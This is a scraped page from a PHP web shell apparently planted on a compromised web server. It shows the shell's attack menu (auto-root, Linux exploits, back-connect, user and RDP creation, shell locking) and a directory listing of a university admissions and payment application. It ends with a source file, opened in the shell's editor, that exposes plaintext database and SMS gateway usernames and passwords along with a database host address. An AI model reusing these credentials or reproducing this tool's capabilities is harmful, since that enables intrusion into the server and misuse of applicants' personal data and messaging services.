Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.129.210.35
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mcu /
adm /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxr-xr-x
Paytm
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dompdf
[ DIR ]
drwxr-xr-x
hdfc
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
pgReports
[ DIR ]
drwxr-xr-x
pget_photos
[ DIR ]
drwxr-xr-x
pgetadm
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
razorpay
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
.DS_Store
27.87
KB
-rwxr-xr-x
BU_connect.php
442
B
-rwxr-xr-x
MainPage.html
52.35
KB
-rwxr-xr-x
MainPage_dev.html
36.76
KB
-rwxr-xr-x
admission_sms_push.php
2.42
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
1.45
KB
-rwxr-xr-x
cronjob_sendsms.php
2.52
KB
-rwxr-xr-x
database.php
405
B
-rwxr-xr-x
error_log.txt
900.33
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
forgotPassword.html
3.84
KB
-rwxr-xr-x
host=172.31.20.139
0
B
-rwxr-xr-x
index.html
5.34
KB
-rwxr-xr-x
index_1.html
130
B
-rwxr-xr-x
instruction.html
10.69
KB
-rwxr-xr-x
instruction_10092018.html
8.37
KB
-rwxr-xr-x
instruction_24092018.html
9.08
KB
-rwxr-xr-x
instruction_regn.html
5.07
KB
-rwxr-xr-x
login.php
294
B
-rwxr-xr-x
pg-forgotPassword.html
4.1
KB
-rwxr-xr-x
pg-sign-up.html
7.15
KB
-rwxr-xr-x
pgResponse.php
7.77
KB
-rwxr-xr-x
pgStudStatus.html
4.32
KB
-rwxr-xr-x
pg_instruction.html
8.53
KB
-rwxr-xr-x
pgadm.html
111.5
KB
-rwxr-xr-x
pgindex.html
6.24
KB
-rwxr-xr-x
resetpassword.php
697
B
-rwxr-xr-x
sendGridMail.php
1.28
KB
-rwxr-xr-x
sendMobEmailOTP.php
1.4
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
sign-up.html
7.29
KB
-rwxr-xr-x
signin.php
992
B
-rwxr-xr-x
signup.php
1.22
KB
-rwxr-xr-x
support.html
5.37
KB
-rwxr-xr-x
upload.php
415
B
-rwxr-xr-x
upload1.php
423
B
-rwxr-xr-x
upload_file.php
748
B
-rwxr-xr-x
upload_file_pg.php
740
B
-rwxr-xr-x
validateRegno.php
2.35
KB
-rwxr-xr-x
verify.php
7.58
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cronjob_sendsms.php
<?php //lib16107 lib16103 ini_set('display_errors', 'on'); include("sendsmsapi.php"); ini_set('memory_limit','900M'); ini_set('max_execution_time',0); $univcode = trim($_GET['funivcode']); // $univcode = '041'; if($univcode == '') { die(); } //connect to database $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $conn = new mysqli($servername,$username,$password); if(!$conn) { die("Connection failed: " . mysqli_connect_error()); } $commondb = "logisys3_comexam"; $query = "select funivcode, fregno, fenttype, fmobileno as mobileno, concat(fmessage,' Sent Time: ',time(now())) as fmessage from {$commondb}.sendsms where ifnull(fstatus, 'F') = 'F' and fenttype in('AI','AC') and funivcode in ('041', '042') and fmobileno is not null"; $result = mysqli_query($conn,$query); $count = mysqli_num_rows($result); $username = 'logisyhttp'; $password = 'Logis986'; $from = 'UNISOL'; $category = ''; if($count >0) { $i = 0; while($row = mysqli_fetch_assoc($result)) { $to = $row['mobileno']; $text = $row['fmessage']; $smsresp = sendsmaapi($username,$password,$from,$to,$text,$category); $rgInsert[] = "('".$row['funivcode']."','".$row['fregno']."','{$to}','0','{$smsresp}','".$row['fenttype']."','T', DATE_FORMAT(NOW(),'%Y-%m-%d'), DATE_FORMAT(NOW(),'%T'))"; $rgTrimedMobs[$i] = $to; if($i == 50) { $strInsertQuery = "insert into {$commondb}.smslog(funivcode, fregno,fmobileno, freasoncode, fguid, fenttype, fstatus,fackdate, facktime) values".implode(',',$rgInsert); //var_dump($strInsertQuery); $result1 = mysqli_query($conn,$strInsertQuery); $srtImplodedMobs = implode("','",$rgTrimedMobs); $strUpdateQuery = "update {$commondb}.sendsms set fstatus = 'T' where fenttype in('AI','AC') and fmobileno in ('{$srtImplodedMobs}')"; //var_dump($strUpdateQuery); $result2 = mysqli_query($conn,$strUpdateQuery); unset($rgInsert); $rgInsert = array(); unset($rgTrimedMobs); $rgTrimedMobs = array(); $i = 0; } $i++; } $strInsertQuery = "insert into {$commondb}.smslog(funivcode,fregno,fmobileno, freasoncode, fguid, fenttype, fstatus,fackdate, facktime) values".implode(',',$rgInsert); //var_dump($strInsertQuery); $result1 = mysqli_query($conn,$strInsertQuery); $srtImplodedMobs = implode("','",$rgTrimedMobs); $strUpdateQuery = "update {$commondb}.sendsms set fstatus = 'T' where fenttype in('AI','AC') and fmobileno in ('{$srtImplodedMobs}')"; //var_dump($strUpdateQuery); $result2 = mysqli_query($conn,$strUpdateQuery); echo "SMS Sent"; } ?>
Close